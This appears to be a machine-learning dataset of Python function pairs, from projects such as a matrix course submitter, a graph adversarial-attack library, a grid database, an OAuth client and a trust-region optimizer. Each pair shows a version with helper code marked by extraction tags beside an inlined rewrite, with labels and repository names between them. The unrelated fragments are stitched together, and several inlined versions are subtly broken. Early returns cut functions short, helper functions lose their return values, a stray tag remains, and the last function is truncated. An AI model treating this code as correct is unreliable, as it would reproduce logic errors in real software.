C012[factor_1][factor_2]['C2'] -> C2
"""
def _wrap_list(data):
return [data] if type(data) is str else data
def _wrap_list_list(data):
return [data] if type(data[0]) is str else data
factor_names_1 = [factor_name_v] if type(factor_name_v) is str else factor_name_v
factor_names_2 = [factor_name_h] if type(factor_name_h) is str else factor_name_h
factor_types_1 = [factor_type_v] if type(factor_type_v) is str else factor_type_v
factor_types_2 = [factor_type_h] if type(factor_type_h) is str else factor_type_h
factor_list_1_list = [factor_value_v] if type(factor_value_v[0]) is str else factor_value_v
factor_list_2_list = [factor_value_h] if type(factor_value_h[0]) is str else factor_value_h
num_row = sum([len(x) for x in factor_list_1_list])
num_col = sum([len(x) for x in factor_list_2_list])
C012 = dict()
print('\n' + ''.join(['-'] * (num_row - 1)) + '>| computing C012 for tDCF')
for (factor_name_1, factor_list_1, factor_type_1) in zip(factor_names_1, factor_list_1_list, factor_types_1):
for (_, factor_1) in enumerate(factor_list_1):
print('.', end='', flush=True)
if factor_1 == pooled_tag:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ''
elif factor_type_1 == config.g_factor_type_spoof:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
elif factor_type_1 == config.g_factor_type_bonafide:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ''
else:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
for (factor_name_2, factor_list_2, factor_type_2) in zip(factor_names_2, factor_list_2_list, factor_types_2):
for (_, factor_2) in enumerate(factor_list_2):
if factor_2 == pooled_tag:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ''
elif factor_type_2 == config.g_factor_type_spoof:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
elif factor_type_2 == config.g_factor_type_bonafide:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ''
else:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_tar = 'label == "{:s}"'.format(target_tag) + qr_tar_fac1 + qr_tar_fac2
qr_ntar = 'label == "{:s}"'.format(nontarget_tag) + qr_ntar_fac1 + qr_ntar_fac2
qr_spoof = 'label == "{:s}"'.format(spoofed_tag) + qr_spoof_fac1 + qr_spoof_fac2
tar_env_pd = asv_score_pd.query(qr_tar)
ntar_env_pd = asv_score_pd.query(qr_ntar)
spoof_env_pd = asv_score_pd.query(qr_spoof)
tar_data = tar_env_pd[col_score_name].to_numpy()
ntar_data = ntar_env_pd[col_score_name].to_numpy()
spoof_data = spoof_env_pd[col_score_name].to_numpy()
(C0, C1, C2) = eval_wrapper.get_tDCF_C012_from_asv_scores(tar_data, ntar_data, spoof_data, cost_model)
eval_wrapper.save_C012_value(C012, C0, C1, C2, [factor_1, factor_2])
print('')
return C012
|
2021
|
positive
|
def submit(parts_string, login, password):
print('= Coding the Matrix Homework and Lab Submission')
if not login:
<DeepExtract>
login = input('Login email address: ')
</DeepExtract>
if not password:
<DeepExtract>
password = input("One-time password from the assignment page (NOT your own account's password): ")
</DeepExtract>
if not parts_string:
<DeepExtract>
print('These are the assignment parts that you can submit:')
for (i, name) in enumerate(part_friendly_names):
print(' %d) %s' % (i + 1, name))
parts_string = input('\nWhich parts do you want to submit? (Ex: 1, 4-7): ')
</DeepExtract>
<DeepExtract>
def extract_range(s):
s = s.split('-')
if len(s) == 1:
parts = [int(s[0])]
else:
parts = list(range(int(s[0]), 1 + int(s[1])))
parts = map(extract_range, parts_string.split(','))
flat_parts = sum(parts, [])
parts = sum(list(map(lambda p: groups[p - 1], flat_parts)), [])
</DeepExtract>
if not all([parts, login, password]):
return
for (sid, name, part_tests) in parts:
sys.stdout.write('== Submitting "%s"' % name)
if 'DEV' in os.environ:
sid += '-dev'
<DeepExtract>
params = {'email_address': login, 'assignment_part_sid': sid, 'response_encoding': 'delim'}
challenge_url = '%s%schallenge' % (protocol, base_url)
data = urllib.parse.urlencode(params).encode('utf-8')
req = urllib.request.Request(challenge_url, data)
resp = urllib.request.urlopen(req)
text = resp.readall().decode('utf-8').strip().split('|')
if len(text) != 9:
print(' !! %s' % '|'.join(text))
sys.exit(1)
(login, ch, state, ch_aux) = tuple((text[x] for x in [2, 4, 6, 8]))
</DeepExtract>
if not all([login, ch, state]):
print(' !! Error: %s\n' % login)
return
<DeepExtract>
dtst = doctest.DocTestParser().get_doctest(part_tests, test_vars, 0, '<string>', 0)
runner = ModifiedDocTestRunner()
runner.run(dtst)
results = runner.results
</DeepExtract>
prog_out = '(%s)' % ''.join(map(str.rstrip, results))
<DeepExtract>
token = hashlib.sha1((ch + password).encode('utf-8')).hexdigest()
</DeepExtract>
<DeepExtract>
src = []
for fn in set(source_files):
with open(fn) as source_f:
src.append(source_f.read())
src = '\n\n'.join(src)
</DeepExtract>
<DeepExtract>
b64ize = lambda s: str(base64.encodebytes(s.encode('utf-8')), 'ascii')
values = {'assignment_part_sid': sid, 'email_address': login, 'submission': b64ize(prog_out), 'submission_aux': b64ize(src), 'challenge_response': token, 'state': state}
submit_url = '%s%ssubmit' % (protocol, base_url)
data = urllib.parse.urlencode(values).encode('utf-8')
req = urllib.request.Request(submit_url, data)
response = urllib.request.urlopen(req)
feedback = response.readall().decode('utf-8').strip()
</DeepExtract>
if len(feedback.strip()) > 0:
if colorize:
good = 'incorrect' not in feedback.lower()
print(': \x1b[1;3%dm%s\x1b[0m' % (2 if good else 1, feedback.strip()))
else:
print(': %s' % feedback.strip())
if verbose:
for (t, r) in zip(part_tests.split('\n'), results):
sys.stdout.write('%s\n%s' % (t, r))
sys.stdout.write('\n\n')
|
def submit(parts_string, login, password):
print('= Coding the Matrix Homework and Lab Submission')
if not login:
login = input('Login email address: ')
if not password:
password = input("One-time password from the assignment page (NOT your own account's password): ")
if not parts_string:
print('These are the assignment parts that you can submit:')
for (i, name) in enumerate(part_friendly_names):
print(' %d) %s' % (i + 1, name))
parts_string = input('\nWhich parts do you want to submit? (Ex: 1, 4-7): ')
def extract_range(s):
s = s.split('-')
if len(s) == 1:
parts = [int(s[0])]
else:
parts = list(range(int(s[0]), 1 + int(s[1])))
parts = map(extract_range, parts_string.split(','))
flat_parts = sum(parts, [])
parts = sum(list(map(lambda p: groups[p - 1], flat_parts)), [])
if not all([parts, login, password]):
return
for (sid, name, part_tests) in parts:
sys.stdout.write('== Submitting "%s"' % name)
if 'DEV' in os.environ:
sid += '-dev'
params = {'email_address': login, 'assignment_part_sid': sid, 'response_encoding': 'delim'}
challenge_url = '%s%schallenge' % (protocol, base_url)
data = urllib.parse.urlencode(params).encode('utf-8')
req = urllib.request.Request(challenge_url, data)
resp = urllib.request.urlopen(req)
text = resp.readall().decode('utf-8').strip().split('|')
if len(text) != 9:
print(' !! %s' % '|'.join(text))
sys.exit(1)
(login, ch, state, ch_aux) = tuple((text[x] for x in [2, 4, 6, 8]))
if not all([login, ch, state]):
print(' !! Error: %s\n' % login)
return
dtst = doctest.DocTestParser().get_doctest(part_tests, test_vars, 0, '<string>', 0)
runner = ModifiedDocTestRunner()
runner.run(dtst)
results = runner.results
prog_out = '(%s)' % ''.join(map(str.rstrip, results))
token = hashlib.sha1((ch + password).encode('utf-8')).hexdigest()
src = []
for fn in set(source_files):
with open(fn) as source_f:
src.append(source_f.read())
src = '\n\n'.join(src)
b64ize = lambda s: str(base64.encodebytes(s.encode('utf-8')), 'ascii')
values = {'assignment_part_sid': sid, 'email_address': login, 'submission': b64ize(prog_out), 'submission_aux': b64ize(src), 'challenge_response': token, 'state': state}
submit_url = '%s%ssubmit' % (protocol, base_url)
data = urllib.parse.urlencode(values).encode('utf-8')
req = urllib.request.Request(submit_url, data)
response = urllib.request.urlopen(req)
feedback = response.readall().decode('utf-8').strip()
if len(feedback.strip()) > 0:
if colorize:
good = 'incorrect' not in feedback.lower()
print(': \x1b[1;3%dm%s\x1b[0m' % (2 if good else 1, feedback.strip()))
else:
print(': %s' % feedback.strip())
if verbose:
for (t, r) in zip(part_tests.split('\n'), results):
sys.stdout.write('%s\n%s' % (t, r))
sys.stdout.write('\n\n')
|
coding-the-matrix
|
positive
|
def main():
u = 0
assert u in idx_unlabeled
degrees = adj.sum(0).A1
n_perturbations = int(degrees[u])
model.attack(features, adj, labels, idx_train, target_node, n_perturbations)
print('=== testing GCN on original(clean) graph ===')
<DeepExtract>
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
</DeepExtract>
print('=== testing GCN on perturbed graph ===')
<DeepExtract>
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, model.modified_adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
</DeepExtract>
|
def main():
u = 0
assert u in idx_unlabeled
degrees = adj.sum(0).A1
n_perturbations = int(degrees[u])
model.attack(features, adj, labels, idx_train, target_node, n_perturbations)
print('=== testing GCN on original(clean) graph ===')
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
print('=== testing GCN on perturbed graph ===')
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, model.modified_adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
</DeepExtract>
|
DeepRobust
|
positive
|
@typecheck
def setRegion(name: str, ofs: np.ndarray, gridValues: np.ndarray):
"""
Update the grid values starting at ``ofs`` with ``gridValues``.
:param str name: grid name.
:param 3D-vector ofs: the values are inserted relative to this ``ofs``.
:param 4D-vector gridValues: the data values to set.
:return: Success
"""
<DeepExtract>
if _DB_Grid is None:
ret = RetVal(False, 'Not initialised', None)
if name not in _DB_Grid.collection_names():
msg = 'Unknown grid <{}>'.format(name)
logit.info(msg)
ret = RetVal(False, msg, None)
db = _DB_Grid[name]
admin = db.find_one({'admin': 'admin'})
if admin is None:
ret = RetVal(False, 'Bug: could not find admin element', None)
ret = RetVal(True, None, (db, admin))
</DeepExtract>
if not ret.ok:
return ret
(db, admin) = ret.data
(gran, vecDim) = (admin['gran'], admin['vecDim'])
del admin, ret
if len(ofs) != 3:
return RetVal(False, 'Invalid parameter values', None)
if len(gridValues.shape) != 4 or gridValues.shape[3] != vecDim:
return RetVal(False, 'Invalid gridValues dimension', None)
bulk = db.initialize_unordered_bulk_op()
for x in range(gridValues.shape[0]):
for y in range(gridValues.shape[1]):
for z in range(gridValues.shape[2]):
val = gridValues[x, y, z, :]
pos = ofs + np.array([x, y, z])
<DeepExtract>
pos = np.array(pos, np.float64)
gran = float(gran)
(px, py, pz) = [int(_ // gran) for _ in pos]
strPos = '{}:{}:{}'.format(px, py, pz)
(px, py, pz, strPos) = (px, py, pz, strPos)
</DeepExtract>
<DeepExtract>
query = {'strPos': strPos}
data = {'x': px, 'y': py, 'z': pz, 'val': val.tolist(), 'strPos': strPos}
(query, data) = (query, data)
</DeepExtract>
if np.sum(np.abs(val)) < 1e-09:
bulk.find(query).remove()
else:
bulk.find(query).upsert().update({'$set': data})
bulk.execute()
return RetVal(True, None, None)
|
@typecheck
def setRegion(name: str, ofs: np.ndarray, gridValues: np.ndarray):
"""
Update the grid values starting at ``ofs`` with ``gridValues``.
:param str name: grid name.
:param 3D-vector ofs: the values are inserted relative to this ``ofs``.
:param 4D-vector gridValues: the data values to set.
:return: Success
"""
if _DB_Grid is None:
ret = RetVal(False, 'Not initialised', None)
if name not in _DB_Grid.collection_names():
msg = 'Unknown grid <{}>'.format(name)
logit.info(msg)
ret = RetVal(False, msg, None)
db = _DB_Grid[name]
admin = db.find_one({'admin': 'admin'})
if admin is None:
ret = RetVal(False, 'Bug: could not find admin element', None)
ret = RetVal(True, None, (db, admin))
if not ret.ok:
return ret
(db, admin) = ret.data
(gran, vecDim) = (admin['gran'], admin['vecDim'])
del admin, ret
if len(ofs) != 3:
return RetVal(False, 'Invalid parameter values', None)
if len(gridValues.shape) != 4 or gridValues.shape[3] != vecDim:
return RetVal(False, 'Invalid gridValues dimension', None)
bulk = db.initialize_unordered_bulk_op()
for x in range(gridValues.shape[0]):
for y in range(gridValues.shape[1]):
for z in range(gridValues.shape[2]):
val = gridValues[x, y, z, :]
pos = ofs + np.array([x, y, z])
pos = np.array(pos, np.float64)
gran = float(gran)
(px, py, pz) = [int(_ // gran) for _ in pos]
strPos = '{}:{}:{}'.format(px, py, pz)
(px, py, pz, strPos) = (px, py, pz, strPos)
query = {'strPos': strPos}
data = {'x': px, 'y': py, 'z': pz, 'val': val.tolist(), 'strPos': strPos}
(query, data) = (query, data)
if np.sum(np.abs(val)) < 1e-09:
bulk.find(query).remove()
else:
bulk.find(query).upsert().update({'$set': data})
bulk.execute()
return RetVal(True, None, None)
|
azrael
|
positive
|
def parse_request_body_response(self, body, scope=None):
"""Parse the JSON response body.
If the access token request is valid and authorized, the
authorization server issues an access token and optional refresh
token as described in `Section 5.1`_. If the request failed client
authentication or is invalid, the authorization server returns an
error response as described in `Section 5.2`_.
.. `Section 5.1`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.1
.. `Section 5.2`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.2
"""
response = parse_token_response(body, scope=scope)
<DeepExtract>
if u'access_token' in response:
self.access_token = response.get(u'access_token')
if u'refresh_token' in response:
self.refresh_token = response.get(u'refresh_token')
if u'token_type' in response:
self.token_type = response.get(u'token_type')
if u'expires_in' in response:
self.expires_in = response.get(u'expires_in')
if u'code' in response:
self.code = response.get(u'code')
</DeepExtract>
return response
|
def parse_request_body_response(self, body, scope=None):
"""Parse the JSON response body.
If the access token request is valid and authorized, the
authorization server issues an access token and optional refresh
token as described in `Section 5.1`_. If the request failed client
authentication or is invalid, the authorization server returns an
error response as described in `Section 5.2`_.
.. `Section 5.1`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.1
.. `Section 5.2`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.2
"""
response = parse_token_response(body, scope=scope)
if u'access_token' in response:
self.access_token = response.get(u'access_token')
if u'refresh_token' in response:
self.refresh_token = response.get(u'refresh_token')
if u'token_type' in response:
self.token_type = response.get(u'token_type')
if u'expires_in' in response:
self.expires_in = response.get(u'expires_in')
if u'code' in response:
self.code = response.get(u'code')
return response
|
alfred2-workflow-help
|
positive
|
def minimize_trust_trsbox(model_gradient, model_hessian, trustregion_radius, *, lower_bounds, upper_bounds):
"""Minimize a qaudratic trust-region subproblem using the trsbox algorithm.
Solve the quadratic trust-region subproblem:
min_x g.T @ x + 0.5 * x.T @ hess @ x
s.t. ||x|| <= trustregion_radius
lower_bounds <= x <= upper_bounds
approximately, using an active-set approach, where g denotes the gradient
and hess the hessian of the quadratic model (i.e. the linear terms and
square_terms), respectively.
The subproblem is assumed to be centered, i.e. ``x_center`` is the zero vector.
The trsbox algorithm applies a conjugate gradient step in its main loop.
This implementation of the quadratic trsbox algorithm is based on
M. J. D. Powell (2009) "The BOBYQA algorithm for bound constrained
optimization without derivatives." (cite:`Powell2009`).
Some modifications to the termination conditions are taken from the
DFBOLS method by Zhang et al. (:cite:`Zhang2010`).
Args:
model_gradient (np.ndarray): 1d array of shape (n,) containing the
gradient (i.e. linear terms) of the quadratic model.
model_hessian (np.ndarray): 2d array of shape (n, n) containing the
hessian (i.e .square terms) of the quadratic model.
lower_bounds (np.ndarray): 1d array of shape (n,) with lower bounds
for the parameter vector x.
upper_bounds (np.ndarray): 1d array of shape (n,) with upper bounds
for the parameter vector x.
trustregion_radius (float): Radius of the trust-region.
Returns:
np.ndarray: Solution vector for the quadratic trust-region subproblem
of shape (n,).
"""
n = len(model_gradient)
x_center = np.zeros(n)
n_iter = 0
n_fixed_variables = 0
x_bounded = np.zeros(n)
x_bounded[(x_center <= lower_bounds) & (model_gradient >= 0.0)] = -1
x_bounded[(x_center >= upper_bounds) & (model_gradient <= 0.0)] = 1
x_candidate = np.zeros(n)
gradient_projected = np.zeros(n)
gradient_candidate = model_gradient
total_reduction = 0
delta_sq = trustregion_radius ** 2
curve_min = -1.0
beta = 0
need_alt_trust_step = False
max_iter = 100 * n ** 2
for _ in range(max_iter):
gradient_projected[x_bounded != 0] = 0
if beta == 0:
gradient_projected[x_bounded == 0] = -gradient_candidate[x_bounded == 0]
else:
gradient_projected[x_bounded == 0] = beta * gradient_projected[x_bounded == 0] - gradient_candidate[x_bounded == 0]
gradient_projected_sumsq = gradient_projected @ gradient_projected
if gradient_projected_sumsq == 0:
need_alt_trust_step = False
break
if beta == 0:
gradient_sumsq = gradient_projected_sumsq
max_iter = n_iter + n - n_fixed_variables
if n_iter == 0:
gradient_sumsq_initial = gradient_sumsq
if gradient_sumsq <= min(1e-06 * gradient_sumsq_initial, 1e-18) or gradient_sumsq * delta_sq <= min(1e-06 * total_reduction ** 2, 1e-18):
need_alt_trust_step = False
break
hess_g = model_hessian @ gradient_projected
g_x = gradient_projected[x_bounded == 0] @ x_candidate[x_bounded == 0]
g_hess_g = gradient_projected[x_bounded == 0] @ hess_g[x_bounded == 0]
raw_distance = delta_sq - x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
if raw_distance <= 0:
need_alt_trust_step = True
break
<DeepExtract>
temp = np.sqrt(gradient_projected_sumsq * raw_distance + g_x ** 2)
if g_x >= 0:
distance_to_boundary = raw_distance / (temp + g_x)
else:
distance_to_boundary = (temp - g_x) / gradient_projected_sumsq
if g_hess_g <= 0:
step_len = distance_to_boundary
else:
step_len = min(distance_to_boundary, gradient_sumsq / g_hess_g)
(step_len, distance_to_boundary) = (step_len, distance_to_boundary)
</DeepExtract>
if step_len <= 1e-30:
need_alt_trust_step = False
break
<DeepExtract>
index_bound_active = None
for i in range(len(x_candidate)):
if gradient_projected[i] != 0:
if gradient_projected[i] > 0:
step_len_constr = (upper_bounds[i] - x_candidate[i]) / gradient_projected[i]
else:
step_len_constr = (lower_bounds[i] - x_candidate[i]) / gradient_projected[i]
if step_len_constr < step_len:
step_len = step_len_constr
index_bound_active = i
(step_len, index_bound_active) = (step_len, index_bound_active)
</DeepExtract>
current_reduction = 0
if step_len > 0:
n_iter += 1
<DeepExtract>
current_min = g_hess_g / gradient_projected_sumsq
if index_bound_active is None and current_min > 0:
if curve_min != -1.0:
curve_min = min(curve_min, current_min)
else:
curve_min = current_min
gradient_sumsq_old = gradient_sumsq
gradient_candidate = gradient_candidate + step_len * hess_g
x_candidate = x_candidate + step_len * gradient_projected
gradient_sumsq = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
current_reduction = max(step_len * (gradient_sumsq_old - 0.5 * step_len * g_hess_g), 0)
total_reduction = total_reduction + current_reduction
(x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old) = (x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old)
</DeepExtract>
if index_bound_active is not None:
n_fixed_variables += 1
if gradient_projected[index_bound_active] >= 0:
x_bounded[index_bound_active] = 1
else:
x_bounded[index_bound_active] = -1
delta_sq = delta_sq - x_candidate[index_bound_active] ** 2
if delta_sq <= 0:
need_alt_trust_step = True
break
beta = 0
continue
if step_len >= distance_to_boundary:
need_alt_trust_step = True
break
if n_iter == max_iter or current_reduction <= 1e-06 * total_reduction:
need_alt_trust_step = False
break
beta = gradient_sumsq / gradient_sumsq_old
continue
if need_alt_trust_step:
curve_min = 0
<DeepExtract>
n = len(x_candidate)
max_iter = 100 * n ** 2
for _ in range(max_iter):
if n_fixed_variables >= n - 1:
x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
break
search_direction = np.zeros(n)
search_direction[x_bounded == 0] = x_candidate[x_bounded == 0]
x_reduced = x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
x_grad = x_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
gradient_reduced = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
hess_s = model_hessian @ search_direction
hessian_reduced = hess_s
restart_alt_loop = False
for _ in range(max_iter):
raw_reduction = gradient_reduced * x_reduced - x_grad ** 2
if raw_reduction <= 0.0001 * total_reduction ** 2:
restart_alt_loop = False
break
(search_direction, s_norm) = _compute_new_search_direction_and_norm(x_candidate, x_bounded, x_reduced, gradient_candidate, x_grad, raw_reduction)
(x_bounded, index_active_bound, n_fixed_variables, active_bound, bound_on_tangent, free_variable_reached_bound) = _calc_upper_bound_on_tangent(x_candidate, search_direction, x_bounded, lower_bounds, upper_bounds, n_fixed_variables)
if free_variable_reached_bound:
restart_alt_loop = True
break
hess_s = model_hessian @ search_direction
s_hess_s = np.sum(search_direction[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_s = np.sum(x_candidate[x_bounded == 0] * hess_s[x_bounded == 0])
x_hess_x = np.sum(x_candidate[x_bounded == 0] * hessian_reduced[x_bounded == 0])
(previous_reduction, next_reduction, max_reduction, tangent, index_angle_greatest_reduction, n_angles) = _calc_greatest_criterion_reduction(bound_on_tangent, s_hess_s, x_hess_s, x_hess_x, x_grad, s_norm)
if index_angle_greatest_reduction == -1:
restart_alt_loop = False
break
if index_angle_greatest_reduction < n_angles - 1:
tangent = _update_tangent(index_angle_greatest_reduction, bound_on_tangent, n_angles, next_reduction, previous_reduction, max_reduction)
cosine = (1.0 - tangent ** 2) / (1.0 + tangent ** 2)
sine = 2.0 * tangent / (1.0 + tangent ** 2)
current_reduction = _calc_new_reduction(tangent, sine, s_hess_s, x_hess_x, x_hess_s, x_grad, s_norm)
if current_reduction <= 0.0:
restart_alt_loop = False
break
(x_candidate, gradient_candidate, x_grad, gradient_reduced, hessian_reduced) = _update_candidate_vectors_and_reduction_alt_step(x_candidate, search_direction, x_bounded, gradient_candidate, cosine, sine, hess_s, hessian_reduced)
total_reduction = total_reduction + current_reduction
if index_active_bound is not None and index_angle_greatest_reduction == n_angles - 1:
n_fixed_variables += 1
x_bounded[index_active_bound] = active_bound
restart_alt_loop = True
break
if current_reduction <= 0.01 * total_reduction:
restart_alt_loop = False
break
continue
if restart_alt_loop:
continue
else:
break
x_candidate = _apply_bounds_to_candidate_vector(x_candidate, x_bounded, lower_bounds, upper_bounds)
x_candidate = x_candidate
</DeepExtract>
else:
<DeepExtract>
x_candidate_new = np.clip(lower_bounds, x_candidate, upper_bounds)
x_candidate_new[x_bounded == -1] = lower_bounds[x_bounded == -1]
x_candidate_new[x_bounded == 1] = upper_bounds[x_bounded == 1]
x_candidate = x_candidate_new
</DeepExtract>
return x_candidate
|
def minimize_trust_trsbox(model_gradient, model_hessian, trustregion_radius, *, lower_bounds, upper_bounds):
"""Minimize a qaudratic trust-region subproblem using the trsbox algorithm.
Solve the quadratic trust-region subproblem:
min_x g.T @ x + 0.5 * x.T @ hess @ x
s.t. ||x|| <= trustregion_radius
lower_bounds <= x <= upper_bounds
approximately, using an active-set approach, where g denotes the gradient
and hess the hessian of the quadratic model (i.e. the linear terms and
square_terms), respectively.
The subproblem is assumed to be centered, i.e. ``x_center`` is the zero vector.
The trsbox algorithm applies a conjugate gradient step in its main loop.
This implementation of the quadratic trsbox algorithm is based on
M. J. D. Powell (2009) "The BOBYQA algorithm for bound constrained
optimization without derivatives." (cite:`Powell2009`).
Some modifications to the termination conditions are taken from the
DFBOLS method by Zhang et al. (:cite:`Zhang2010`).
Args:
model_gradient (np.ndarray): 1d array of shape (n,) containing the
gradient (i.e. linear terms) of the quadratic model.
model_hessian (np.ndarray): 2d array of shape (n, n) containing the
hessian (i.e .square terms) of the quadratic model.
lower_bounds (np.ndarray): 1d array of shape (n,) with lower bounds
for the parameter vector x.
upper_bounds (np.ndarray): 1d array of shape (n,) with upper bounds
for the parameter vector x.
trustregion_radius (float): Radius of the trust-region.
Returns:
np.ndarray: Solution vector for the quadratic trust-region subproblem
of shape (n,).
"""
n = len(model_gradient)
x_center = np.zeros(n)
n_iter = 0
n_fixed_variables = 0
x_bounded = np.zeros(n)
x_bounded[(x_center <= lower_bounds) & (model_gradient >= 0.0)] = -1
x_bounded[(x_center >= upper_bounds) & (model_gradient <= 0.0)] = 1
x_candidate = np.zeros(n)
gradient_projected = np.zeros(n)
gradient_candidate = model_gradient
total_reduction = 0
delta_sq = trustregion_radius ** 2
curve_min = -1.0
beta = 0
need_alt_trust_step = False
max_iter = 100 * n ** 2
for _ in range(max_iter):
gradient_projected[x_bounded != 0] = 0
if beta == 0:
gradient_projected[x_bounded == 0] = -gradient_candidate[x_bounded == 0]
else:
gradient_projected[x_bounded == 0] = beta * gradient_projected[x_bounded == 0] - gradient_candidate[x_bounded == 0]
gradient_projected_sumsq = gradient_projected @ gradient_projected
if gradient_projected_sumsq == 0:
need_alt_trust_step = False
break
if beta == 0:
gradient_sumsq = gradient_projected_sumsq
max_iter = n_iter + n - n_fixed_variables
if n_iter == 0:
gradient_sumsq_initial = gradient_sumsq
if gradient_sumsq <= min(1e-06 * gradient_sumsq_initial, 1e-18) or gradient_sumsq * delta_sq <= min(1e-06 * total_reduction ** 2, 1e-18):
need_alt_trust_step = False
break
hess_g = model_hessian @ gradient_projected
g_x = gradient_projected[x_bounded == 0] @ x_candidate[x_bounded == 0]
g_hess_g = gradient_projected[x_bounded == 0] @ hess_g[x_bounded == 0]
raw_distance = delta_sq - x_candidate[x_bounded == 0] @ x_candidate[x_bounded == 0]
if raw_distance <= 0:
need_alt_trust_step = True
break
temp = np.sqrt(gradient_projected_sumsq * raw_distance + g_x ** 2)
if g_x >= 0:
distance_to_boundary = raw_distance / (temp + g_x)
else:
distance_to_boundary = (temp - g_x) / gradient_projected_sumsq
if g_hess_g <= 0:
step_len = distance_to_boundary
else:
step_len = min(distance_to_boundary, gradient_sumsq / g_hess_g)
(step_len, distance_to_boundary) = (step_len, distance_to_boundary)
if step_len <= 1e-30:
need_alt_trust_step = False
break
index_bound_active = None
for i in range(len(x_candidate)):
if gradient_projected[i] != 0:
if gradient_projected[i] > 0:
step_len_constr = (upper_bounds[i] - x_candidate[i]) / gradient_projected[i]
else:
step_len_constr = (lower_bounds[i] - x_candidate[i]) / gradient_projected[i]
if step_len_constr < step_len:
step_len = step_len_constr
index_bound_active = i
(step_len, index_bound_active) = (step_len, index_bound_active)
current_reduction = 0
if step_len > 0:
n_iter += 1
current_min = g_hess_g / gradient_projected_sumsq
if index_bound_active is None and current_min > 0:
if curve_min != -1.0:
curve_min = min(curve_min, current_min)
else:
curve_min = current_min
gradient_sumsq_old = gradient_sumsq
gradient_candidate = gradient_candidate + step_len * hess_g
x_candidate = x_candidate + step_len * gradient_projected
gradient_sumsq = gradient_candidate[x_bounded == 0] @ gradient_candidate[x_bounded == 0]
current_reduction = max(step_len * (gradient_sumsq_old - 0.5 * step_len * g_hess_g), 0)
total_reduction = total_reduction + current_reduction
(x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old) = (x_candidate, gradient_candidate, current_reduction, total_reduction, curve_min, gradient_sumsq, gradient_sumsq_old)
if index_bound_active is not None:
n_fixed_variables += 1
if gradient_projected[index_bound_active] >= 0:
x_bounded[index_bound_active] = 1
else:
x_bounded[index_bound_active] = -1
delta_sq = delta_sq - x_candidate[index_bound_active] ** 2
if delta_sq <= 0:
need_alt_trust_step = True
break
beta = 0
continue
if step_len >= distance_to_boundary:
need_alt_trust_step = True
break
if n_iter == max_iter or current_reduction <= 1e-06 * total_reduction:
need_alt_trust_step = False
break
beta = gradient_sumsq / gradient_sumsq_old
continue
if need_alt_trust_step:
curve_min = 0
n = len(x_candidate)
max_iter = 100 * n ** 2
for _ in range(max_iter):
if n_fixed_variables >= n - 1:
